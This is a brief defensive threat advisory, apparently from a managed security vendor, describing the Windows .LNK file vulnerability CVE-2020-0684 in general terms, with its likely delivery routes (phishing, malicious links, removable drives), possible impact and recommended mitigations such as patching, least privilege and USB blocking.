This report is about a vulnerability called CVE-2020-0684 which affects multiple versions of the Microsoft Windows operating system. The vulnerability is due to a mishandling of a specific file type where successful exploitation generally depends on social engineering. There are multiple patches available from Microsoft depending on the type of operating system in use.
Tactics, Techniques, and Procedures
The vulnerability is caused by the mishandling of specially crafted .LNK files which allows an attacker to package malicious code and gain user privileges. The user privileges being gained here are that of the current running user which could have far reaching implications depending on that specific user account’s permission levels.
Bad actors use three common tactics to package their malware in a variety of forms.
- A fairly easy means of successful exploitation could occur when the bad actor sends the user a phishing email filled with scare tactics. That email would have an attachment containing a .LNK file packed with malicious code or the .LNK file could simply be linked back to malware.
- The second proposed method involves linking the .LNK file back to a website containing malware such as a landing page.
- The file can also be linked back to a malicious binary which opens a myriad of options for the threat actor.
The software flaw opens users to social engineering. Other potential methods of distributing the malicious file could involve the following: putting the file on a removable drive or using a remote network share both of which require some work.
- Could result in a myriad of potential exploitation methods resulting in the propagation of malware throughout the network
- The possibility of lateral movement is likely depending on the current running user on the affected host which may allow a bad actor to entrench themselves in the environment given enough time
We strongly encourage implementing the vendor patch here.
- Consider operating with the least privilege principle in mind when designing the environment with a focus on user’s computers
- Consider blocking USB devices by default with the ability in some application suites for device whitelisting using hardware identifiers
- Spam filtering with phishing awareness training may help reduce the likelihood of users getting phished
IBM X-Force Exchange:
Belkasoft’s Forensic Analysis of LNK Files
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.
This informed analysis is based on the latest data available.
Contact us for more information about Avertium’s managed detection and response service capabilities.